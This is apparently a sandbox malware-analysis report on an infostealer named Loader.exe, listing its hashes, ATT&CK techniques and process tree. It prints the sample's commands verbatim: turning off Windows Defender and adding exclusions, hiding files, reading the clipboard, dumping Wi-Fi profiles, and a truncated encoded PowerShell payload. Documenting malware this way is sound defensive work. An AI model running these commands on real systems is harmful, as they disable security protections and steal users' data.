62da5c7656bd7e3b8ce3d57fd321cde02a484638793f69a1e72ec61a4b0463cc

Analysis

max time kernel
6s
max time network
15s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
17/01/2025, 20:49 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Loader.exe
Size

7.0MB
MD5

0a2d7084722af48014d2d3c57d82a4cf
SHA1

a0d9b13c5322e7c51824d97878526a4661c1f9b9
SHA256

62da5c7656bd7e3b8ce3d57fd321cde02a484638793f69a1e72ec61a4b0463cc
SHA512

a88e2cf7e3254e5aa0f205fbc0a4c00eeadf2ff1415bd5a7476e9ec3f79a31bdc261915165e8250849e70e0fef7ad0c195f09375dd1092376e63dd39e3b4dbbe
SSDEEP

98304:4FDjWM8JEE1FE6amaHl3Ne4i3Tf2PkOpfW9hZMMoVmkzhxIdfXeRiYRJJcGhEIF5:4F0ceNTfm/pf+xk4dWRimrbW3jmyW

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3492	powershell.exe
2748	powershell.exe
4840	powershell.exe
3184	powershell.exe
3312	powershell.exe
2252	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Loader.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3688	cmd.exe
1128	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1732	bound.exe

Loads dropped DLL 18 IoCs

pid	Process
4932	Loader.exe
4932	Loader.exe
4932	Loader.exe
4932	Loader.exe
4932	Loader.exe
4932	Loader.exe
4932	Loader.exe
4932	Loader.exe
4932	Loader.exe
4932	Loader.exe
4932	Loader.exe
4932	Loader.exe
4932	Loader.exe
4932	Loader.exe
4932	Loader.exe
4932	Loader.exe
4932	Loader.exe
1732	bound.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ip-api.com
31	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
1332	tasklist.exe
1416	tasklist.exe
4048	tasklist.exe
4684	tasklist.exe
4412	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4672	cmd.exe

UPX packed file 43 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0008000000023bec-22.dat	upx
behavioral1/memory/4932-26-0x00007FFF353A0000-0x00007FFF35988000-memory.dmp	upx
behavioral1/files/0x0009000000023ba6-28.dat	upx
behavioral1/memory/4932-30-0x00007FFF48210000-0x00007FFF48234000-memory.dmp	upx
behavioral1/files/0x0008000000023be6-32.dat	upx
behavioral1/memory/4932-50-0x00007FFF4A8D0000-0x00007FFF4A8DF000-memory.dmp	upx
behavioral1/files/0x0008000000023be1-49.dat	upx
behavioral1/files/0x0008000000023bb2-48.dat	upx
behavioral1/files/0x0008000000023bb1-47.dat	upx
behavioral1/files/0x0008000000023bb0-46.dat	upx
behavioral1/files/0x0008000000023baf-45.dat	upx
behavioral1/files/0x0008000000023bac-44.dat	upx
behavioral1/files/0x000e000000023baa-43.dat	upx
behavioral1/files/0x0009000000023ba5-42.dat	upx
behavioral1/files/0x0008000000023c07-41.dat	upx
behavioral1/files/0x0008000000023c06-40.dat	upx
behavioral1/files/0x0008000000023c05-39.dat	upx
behavioral1/files/0x0008000000023beb-36.dat	upx
behavioral1/files/0x0008000000023be5-35.dat	upx
behavioral1/memory/4932-56-0x00007FFF44890000-0x00007FFF448BD000-memory.dmp	upx
behavioral1/memory/4932-58-0x00007FFF44B00000-0x00007FFF44B19000-memory.dmp	upx
behavioral1/memory/4932-60-0x00007FFF44790000-0x00007FFF447B3000-memory.dmp	upx
behavioral1/memory/4932-62-0x00007FFF34EB0000-0x00007FFF35023000-memory.dmp	upx
behavioral1/memory/4932-64-0x00007FFF44770000-0x00007FFF44789000-memory.dmp	upx
behavioral1/memory/4932-66-0x00007FFF485B0000-0x00007FFF485BD000-memory.dmp	upx
behavioral1/memory/4932-68-0x00007FFF44990000-0x00007FFF449BE000-memory.dmp	upx
behavioral1/memory/4932-71-0x00007FFF353A0000-0x00007FFF35988000-memory.dmp	upx
behavioral1/memory/4932-72-0x00007FFF34830000-0x00007FFF348E8000-memory.dmp	upx
behavioral1/memory/4932-75-0x00007FFF48210000-0x00007FFF48234000-memory.dmp	upx
behavioral1/memory/4932-74-0x00007FFF344B0000-0x00007FFF34825000-memory.dmp	upx
behavioral1/memory/4932-78-0x00007FFF48120000-0x00007FFF48134000-memory.dmp	upx
behavioral1/memory/4932-80-0x00007FFF455D0000-0x00007FFF455DD000-memory.dmp	upx
behavioral1/memory/4932-84-0x00007FFF34390000-0x00007FFF344AC000-memory.dmp	upx
behavioral1/memory/4932-83-0x00007FFF44790000-0x00007FFF447B3000-memory.dmp	upx
behavioral1/memory/4932-130-0x00007FFF44770000-0x00007FFF44789000-memory.dmp	upx
behavioral1/memory/4932-282-0x00007FFF44990000-0x00007FFF449BE000-memory.dmp	upx
behavioral1/memory/4932-307-0x00007FFF34830000-0x00007FFF348E8000-memory.dmp	upx
behavioral1/memory/4932-308-0x00007FFF344B0000-0x00007FFF34825000-memory.dmp	upx
behavioral1/memory/4932-326-0x00007FFF34EB0000-0x00007FFF35023000-memory.dmp	upx
behavioral1/memory/4932-334-0x00007FFF34390000-0x00007FFF344AC000-memory.dmp	upx
behavioral1/memory/4932-320-0x00007FFF353A0000-0x00007FFF35988000-memory.dmp	upx
behavioral1/memory/4932-321-0x00007FFF48210000-0x00007FFF48234000-memory.dmp	upx
behavioral1/memory/4932-333-0x00007FFF455D0000-0x00007FFF455DD000-memory.dmp	upx

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Fonts\CreateDir.bat	bound.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1524	cmd.exe
3152	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4924	WMIC.exe
3540	WMIC.exe
2444	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3044	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
3492	powershell.exe
3184	powershell.exe
3312	powershell.exe
3312	powershell.exe
3492	powershell.exe
3492	powershell.exe
3184	powershell.exe
3184	powershell.exe
3312	powershell.exe
2252	powershell.exe
2252	powershell.exe
1128	powershell.exe
1128	powershell.exe
1128	powershell.exe
5104	powershell.exe
5104	powershell.exe
5104	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3492	powershell.exe
Token: SeDebugPrivilege	3184	powershell.exe
Token: SeDebugPrivilege	4684	tasklist.exe
Token: SeIncreaseQuotaPrivilege	1476	WMIC.exe
Token: SeSecurityPrivilege	1476	WMIC.exe
Token: SeTakeOwnershipPrivilege	1476	WMIC.exe
Token: SeLoadDriverPrivilege	1476	WMIC.exe
Token: SeSystemProfilePrivilege	1476	WMIC.exe
Token: SeSystemtimePrivilege	1476	WMIC.exe
Token: SeProfSingleProcessPrivilege	1476	WMIC.exe
Token: SeIncBasePriorityPrivilege	1476	WMIC.exe
Token: SeCreatePagefilePrivilege	1476	WMIC.exe
Token: SeBackupPrivilege	1476	WMIC.exe
Token: SeRestorePrivilege	1476	WMIC.exe
Token: SeShutdownPrivilege	1476	WMIC.exe
Token: SeDebugPrivilege	1476	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1476	WMIC.exe
Token: SeRemoteShutdownPrivilege	1476	WMIC.exe
Token: SeUndockPrivilege	1476	WMIC.exe
Token: SeManageVolumePrivilege	1476	WMIC.exe
Token: 33	1476	WMIC.exe
Token: 34	1476	WMIC.exe
Token: 35	1476	WMIC.exe
Token: 36	1476	WMIC.exe
Token: SeDebugPrivilege	3312	powershell.exe
Token: SeIncreaseQuotaPrivilege	1476	WMIC.exe
Token: SeSecurityPrivilege	1476	WMIC.exe
Token: SeTakeOwnershipPrivilege	1476	WMIC.exe
Token: SeLoadDriverPrivilege	1476	WMIC.exe
Token: SeSystemProfilePrivilege	1476	WMIC.exe
Token: SeSystemtimePrivilege	1476	WMIC.exe
Token: SeProfSingleProcessPrivilege	1476	WMIC.exe
Token: SeIncBasePriorityPrivilege	1476	WMIC.exe
Token: SeCreatePagefilePrivilege	1476	WMIC.exe
Token: SeBackupPrivilege	1476	WMIC.exe
Token: SeRestorePrivilege	1476	WMIC.exe
Token: SeShutdownPrivilege	1476	WMIC.exe
Token: SeDebugPrivilege	1476	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1476	WMIC.exe
Token: SeRemoteShutdownPrivilege	1476	WMIC.exe
Token: SeUndockPrivilege	1476	WMIC.exe
Token: SeManageVolumePrivilege	1476	WMIC.exe
Token: 33	1476	WMIC.exe
Token: 34	1476	WMIC.exe
Token: 35	1476	WMIC.exe
Token: 36	1476	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4924	WMIC.exe
Token: SeSecurityPrivilege	4924	WMIC.exe
Token: SeTakeOwnershipPrivilege	4924	WMIC.exe
Token: SeLoadDriverPrivilege	4924	WMIC.exe
Token: SeSystemProfilePrivilege	4924	WMIC.exe
Token: SeSystemtimePrivilege	4924	WMIC.exe
Token: SeProfSingleProcessPrivilege	4924	WMIC.exe
Token: SeIncBasePriorityPrivilege	4924	WMIC.exe
Token: SeCreatePagefilePrivilege	4924	WMIC.exe
Token: SeBackupPrivilege	4924	WMIC.exe
Token: SeRestorePrivilege	4924	WMIC.exe
Token: SeShutdownPrivilege	4924	WMIC.exe
Token: SeDebugPrivilege	4924	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4924	WMIC.exe
Token: SeRemoteShutdownPrivilege	4924	WMIC.exe
Token: SeUndockPrivilege	4924	WMIC.exe
Token: SeManageVolumePrivilege	4924	WMIC.exe
Token: 33	4924	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 868 wrote to memory of 4932	868	Loader.exe	83
PID 868 wrote to memory of 4932	868	Loader.exe	83
PID 4932 wrote to memory of 2860	4932	Loader.exe	84
PID 4932 wrote to memory of 2860	4932	Loader.exe	84
PID 4932 wrote to memory of 3676	4932	Loader.exe	85
PID 4932 wrote to memory of 3676	4932	Loader.exe	85
PID 4932 wrote to memory of 876	4932	Loader.exe	87
PID 4932 wrote to memory of 876	4932	Loader.exe	87
PID 4932 wrote to memory of 2728	4932	Loader.exe	88
PID 4932 wrote to memory of 2728	4932	Loader.exe	88
PID 4932 wrote to memory of 2580	4932	Loader.exe	91
PID 4932 wrote to memory of 2580	4932	Loader.exe	91
PID 4932 wrote to memory of 1200	4932	Loader.exe	93
PID 4932 wrote to memory of 1200	4932	Loader.exe	93
PID 3676 wrote to memory of 3492	3676	cmd.exe	96
PID 3676 wrote to memory of 3492	3676	cmd.exe	96
PID 4932 wrote to memory of 1168	4932	Loader.exe	97
PID 4932 wrote to memory of 1168	4932	Loader.exe	97
PID 876 wrote to memory of 3184	876	cmd.exe	99
PID 876 wrote to memory of 3184	876	cmd.exe	99
PID 1200 wrote to memory of 4684	1200	cmd.exe	100
PID 1200 wrote to memory of 4684	1200	cmd.exe	100
PID 2860 wrote to memory of 3312	2860	cmd.exe	101
PID 2860 wrote to memory of 3312	2860	cmd.exe	101
PID 2728 wrote to memory of 1732	2728	cmd.exe	102
PID 2728 wrote to memory of 1732	2728	cmd.exe	102
PID 1168 wrote to memory of 1476	1168	cmd.exe	104
PID 1168 wrote to memory of 1476	1168	cmd.exe	104
PID 2580 wrote to memory of 3960	2580	cmd.exe	105
PID 2580 wrote to memory of 3960	2580	cmd.exe	105
PID 1732 wrote to memory of 928	1732	bound.exe	107
PID 1732 wrote to memory of 928	1732	bound.exe	107
PID 4932 wrote to memory of 2852	4932	Loader.exe	108
PID 4932 wrote to memory of 2852	4932	Loader.exe	108
PID 2852 wrote to memory of 2916	2852	cmd.exe	110
PID 2852 wrote to memory of 2916	2852	cmd.exe	110
PID 4932 wrote to memory of 3952	4932	Loader.exe	111
PID 4932 wrote to memory of 3952	4932	Loader.exe	111
PID 3952 wrote to memory of 3620	3952	cmd.exe	113
PID 3952 wrote to memory of 3620	3952	cmd.exe	113
PID 4932 wrote to memory of 1628	4932	Loader.exe	114
PID 4932 wrote to memory of 1628	4932	Loader.exe	114
PID 1628 wrote to memory of 4924	1628	cmd.exe	116
PID 1628 wrote to memory of 4924	1628	cmd.exe	116
PID 4932 wrote to memory of 5056	4932	Loader.exe	117
PID 4932 wrote to memory of 5056	4932	Loader.exe	117
PID 5056 wrote to memory of 3540	5056	cmd.exe	119
PID 5056 wrote to memory of 3540	5056	cmd.exe	119
PID 4932 wrote to memory of 4672	4932	Loader.exe	120
PID 4932 wrote to memory of 4672	4932	Loader.exe	120
PID 4932 wrote to memory of 956	4932	Loader.exe	122
PID 4932 wrote to memory of 956	4932	Loader.exe	122
PID 956 wrote to memory of 2252	956	cmd.exe	124
PID 956 wrote to memory of 2252	956	cmd.exe	124
PID 4672 wrote to memory of 3144	4672	cmd.exe	125
PID 4672 wrote to memory of 3144	4672	cmd.exe	125
PID 4932 wrote to memory of 2432	4932	Loader.exe	126
PID 4932 wrote to memory of 2432	4932	Loader.exe	126
PID 4932 wrote to memory of 1248	4932	Loader.exe	127
PID 4932 wrote to memory of 1248	4932	Loader.exe	127
PID 2432 wrote to memory of 4412	2432	cmd.exe	130
PID 2432 wrote to memory of 4412	2432	cmd.exe	130
PID 1248 wrote to memory of 1332	1248	cmd.exe	131
PID 1248 wrote to memory of 1332	1248	cmd.exe	131

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
244	attrib.exe
1136	attrib.exe
3144	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:868
- C:\Users\Admin\AppData\Local\Temp\Loader.exe
  "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Loader.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2860
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Loader.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3676
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:876
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2728
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in Windows directory
      Suspicious use of WriteProcessMemory
      PID:1732
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Windows\Fonts\CreateDir.bat
        5⤵
        
        PID:928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please load driver', 0, 'Error', 32+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2580
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please load driver', 0, 'Error', 32+16);close()"
      4⤵
      PID:3960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1200
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1168
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2852
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:2916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3952
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:3620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1628
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:4924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5056
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Loader.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:4672
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
      4⤵
      Views/modifies file attributes
      PID:3144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:956
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2432
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1248
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:716
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:1996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:3688
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:1128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1596
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4324
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1524
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:968
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:1048
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACg